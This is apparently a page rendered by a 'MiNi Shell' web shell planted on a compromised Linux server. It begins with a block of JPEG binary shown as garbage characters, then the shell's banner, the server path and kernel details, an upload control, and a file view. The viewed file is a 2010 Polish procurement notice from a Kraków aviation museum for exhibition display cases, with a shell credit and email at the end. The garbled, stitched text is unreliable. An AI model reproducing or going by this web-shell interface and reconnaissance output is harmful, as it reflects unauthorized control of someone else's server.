JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100827/268748-N-2010.html

<p class="kh_header"><b>Kraków: Dostawa gablot ekspozycyjnych na wystawę NATO vs. Układ w ramach projektu pn. Między Wschodem a Zachodem... - wystawa statków powietrznych Sojuszu Północnoatlantyckiego - NATO 1949-2009</b><br>
<b>Numer ogłoszenia: 268748 - 2010; data zamieszczenia: 27.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Lotnictwa Polskiego w Krakowie , Al. Jana Pawła II 39, 30-969 Kraków, woj. małopolskie, tel. 012 6428700, faks 012 6428700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeumlotnictwa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa gablot ekspozycyjnych na wystawę NATO vs. Układ w ramach projektu pn. Między Wschodem a Zachodem... - wystawa statków powietrznych Sojuszu Północnoatlantyckiego - NATO 1949-2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa do siedziby zamawiającego oraz montaż następujących elementów:
a)	gablota wolnostojąca szczelna - sztuk 4
Wymiary gabloty znajdują się w załączniku nr. 7
Gablota wykonana jako szczelna. Korpus szklany gabloty wykonany ze szkła bezpiecznego laminowanego gr. 8,4 mm lub szkła hartowanego gr 8mm. Krawędzie pionowe fazowane pod kątem 45° szlifowane, łączone za pomocą silikonowej bezbarwnej uszczelki. Gablota bez półek.
Szklane boki wklejone za pomocą neutralnego silikonu w profile aluminiowe lakierowane proszkowo efekt imitujący surowy beton lub aluminium. Wykonawca przedstawi próbki rozwiązań do  akceptacji Zamawiającemu. 
Zamek z wkładką dyskową (Abloy/Gerda), spełniający wymogi klasy C (najwyższa klasa odporności na włamanie). Możliwość zastosowania systemu jednego klucza. Dostęp do wnętrza gabloty poprzez otwierane na zawiasach drzwi szklane, kąt otwarcia około 110°. 
Gablota wykonana w wersji do jej bezpiecznego przemieszczania wózkiem widłowym. Gablota wyposażona w stopki regulacyjne do wypoziomowania gabloty. 
Gablota z oświetleniem typu LED. Oświetlenie gabloty zrealizowane za pomocą diod LED, zamocowanych w oprawach z możliwością regulacji kąta pochylenia. Temperatura bieli w przedziale 3000-4500K. Oświetlenie z możliwością regulacji natężenia oświetlenia.
b)	gablota stolikowa na stalowym postumencie - sztuk 2
Wymiary gabloty znajdują się w załączniku nr. 8
Podstawę gabloty stanowi  postument wykonany blach stalowych, malowany farbą proszkową , w kolorze Wskazanym przez Zamawiającego. Przewiduje się malowanie farbą proszkową imitującą efekt surowego betonu lub aluminium. Wykonawca przedstawi próbki rozwiązań do  akceptacji  Zamawiającemu.
Wkład ekspozycyjny płaski obity tkaniną.
Klosz szklany wykonany jest ze szkła laminowanego grubości 8,4. Folia zastosowana do laminowania szkła  musi w znacznym stopniu zatrzymywać promieniowanie UV.
Klosze klejone klejem UV, a krawędzie klejenia polerowane, zacinane są pod kątem 45o.  Uzyskana w ten sposób powierzchnia łączenia musi być trwała i estetyczna. Klosz osadzony jest w ramie stalowej lakierowanej proszkowo i podnoszony za pomocą  sprężyn  gazowych.
Gablota wykonana  jako szczelna.
W gablocie montowany zamek z wkładką dyskową firmy GERDA spełniający wymagania klasy bezpieczeństwa C. Klucze do zamków zabezpieczone kodami, aby osoby nie posiadające symbolu kodu klucza nie mogły go skopiować.
Gablota  wyposażona w stopy regulacyjne umożliwiające poziomowanie, wkładkę obitą tkaniną, na której prezentowane są zbiory, oraz pojemnik na absorber.
Gablota z oświetleniem typu LED. Oświetlenie gabloty zrealizowane za pomocą diod LED, zamocowanych w oprawie- małym ceowniku. Oprawa diodowa zamontowana wzdłuż dłuższego boku  gabloty. Temperatura bieli w przedziale 3000-4500K (do ustalenia). Oświetlenie z możliwością regulacji natężenia oświetlenia.
c)	gablota stolikowa na stalowym postumencie - sztuk 2
Wymiary gabloty znajdują się w załączniku nr. 9
Podstawę gabloty stanowi  postument wykonany blach stalowych, malowany farbą proszkową , w kolorze Wskazanym przez Zamawiającego. Przewiduje się malowanie farbą proszkową imitującą efekt surowego betonu lub aluminium. Wykonawca przedstawi próbki rozwiązań do  akceptacji  Zamawiającemu.
Wkład ekspozycyjny skośny obity tkaniną.
Klosz szklany wykonany jest ze szkła laminowanego grubości 8,4. Folia zastosowana do laminowania szkła  musi w znacznym stopniu zatrzymywać promieniowanie UV.
Klosze klejone klejem UV, a krawędzie klejenia polerowane, zacinane są pod kątem 45o.  Uzyskana w ten sposób powierzchnia łączenia musi być trwała i estetyczna. Klosz osadzony jest w ramie stalowej lakierowanej proszkowo i podnoszony za pomocą  sprężyn  gazowych.
Gablota wykonana  jako szczelna.
W gablocie montowany zamek z wkładką dyskową firmy GERDA spełniający wymagania klasy bezpieczeństwa C. Klucze do zamków zabezpieczone kodami, aby osoby nie posiadające symbolu kodu klucza nie mogły go skopiować.
Gablota  wyposażona w stopy regulacyjne umożliwiające poziomowanie, wkładkę obitą tkaniną, na której prezentowane są zbiory, oraz pojemnik na absorber.
Gablota z oświetleniem typu LED. Oświetlenie gabloty zrealizowane za pomocą diod LED, zamocowanych w oprawie- małym ceowniku. Oprawa diodowa zamontowana wzdłuż dłuższego boku  gabloty. Temperatura bieli w przedziale 3000-4500K (do ustalenia). Oświetlenie z możliwością regulacji natężenia oświetlenia.
d)	dodatkowe oświetlenie gablot oraz ekspozycji wraz z montażem: 
1)	reflektory PAR 30 z żarówką 30st kątem świecenia 75W do PAR 30 - 18 sztuki
2)	reflektory PAR 56 krótki z żarówką WFL 300 W do PAR 56 oraz filtrem dyfuzyjnym - 4 sztuki
3)	ściemniacz cyfrowy 4 x 5A - 2 sztuki

2.	Oznaczenie wg CPV:  39290000-1 wyposażenie różne
3.	Jeśli w opisach występują: nazwy konkretnego producenta, nazwy koloru z konkretnego katalogu czy zdjęcia konkretnego produktu, należy to traktować jedynie jako pomoc w opisie przedmiotu zamówienia. 
W każdym przypadku dopuszczalne są produkty równoważne pod względem konstrukcji, kolorystyki, materiałów.
4.	Dostarczony sprzęt winien być nowy, nieużywany, bez wad i uszkodzeń.
5.	Dostarczony sprzęt musi posiadać wszystkie wymagane prawem polskim certyfikaty.
6.	Warunki realizacji zamówienia zawarte są we wzorze umowy stanowiącym załącznik nr 5 do niniejszej specyfikacji istotnych warunków zamówienia.
7.	Wymagany minimalny okres gwarancji na dostarczony sprzęt wynosi 24 miesiące, licząc od daty odbioru przedmiotu dostawy. 
8.	Przedmiot zamówienia finansowany jest z udziałem środków unijnych w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przed upływem terminu składania ofert, wykonawca zobowiązany jest wnieść wadium przetargowe, na czas równy okresowi związania ofertą, w wysokości: 
	2.000,00 zł 
2. Wadium może być wniesione w jednej lub kilku formach wymienionych w art. 45 ust. 6 ustawy
3. Wadium w formie pieniężnej winno być wniesione przelewem na konto: w Banku PKO BP,  właściciel konta: Muzeum Lotnictwa Polskiego, nr 08 1020 2906 0000 1502 0019 9232  z dopiskiem Wpłata wadium.
4. Wadium w pozostałych formach winno być wniesione do kasy znajdującej się w siedzibie Zamawiającego w Sekretariacie Dyrektora. Kasa jest czynna od poniedziałku do piątku w godzinach  od 8:00 do 14:00.
5. Wadium wnoszone w formach innych niż w pieniądzu, winno gwarantować zamawiającemu wypłatę wadium, w przypadku zaistnienia okoliczności wskazanych w art. 46 ust. 4a i 5 ustawy. Niedopuszczalne jest wprowadzanie jakichkolwiek warunków ograniczających zamawiającemu wypłacenie wadium. 
6. Zamawiający zwraca lub zatrzymuje wadium na zasadach i w trybie art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w zakresie niezbędnym do wykazania spełniania warunków o których mowa w pkt VI ppkt 2 litera a) niniejszej siwz w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - zał nr 6, oraz załączeniem dokumentu potwierdzającego, że te dostawy  zostały wykonane lub są wykonywane należycie oraz zawierać informacje takie jak: nazwę odbiorcy (wystawca referencji), termin realizacji dostawy, przedmiot dostawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">b)	Opinię konstruktora z uprawnieniami w zakresie uprawnień konstrukcyjno-budowlanych, dotyczącej spełnienia norm bezpieczeństwa w zakresie statyki, konstrukcji oraz eksploatacji gablot wykonanych według załączonego projektu na podstawie  własnych rozwiązań technicznych wykonawcy. Szczególnie ważne jest spełnienie trzech warunków:
	Konstrukcja gabloty słupkowej zapewnie jej bezpieczny transport wózkiem widłowym
	Po całkowitym otwarciu drzwi gabloty słupkowej (90 stopni) i przyłożeniu na wysokości 1.2 m siły zewnętrznej 500 N do tylnej częsci gabloty (najbardziej niebezpieczny przypadek) zostanie spełniony warunek stabilności gabloty
	Sprężyny gazowe podnoszące klosz szklany (w przypadku gabloty stolikowej) z osią obrotu wzdłuż długiej krawędzi zostały prawidłowo dobrane i gwarantują bezpieczne użytkowanie gablot.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zgodnie z treścią specyfikacji istotnych warunków zamówienia postępowania oznaczonego jako DA.24-27/10</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeumlotnictwa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Lotnictwa Polskiego,Aleja Jana Pawła II 39, 30-969 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2010 godzina 12:00, miejsce: W siedzibie zamawiającego,Kraków Aleja Jana Pawła II 39, w sekretariacie Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 8.	Przedmiot zamówienia finansowany jest z udziałem środków unijnych w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com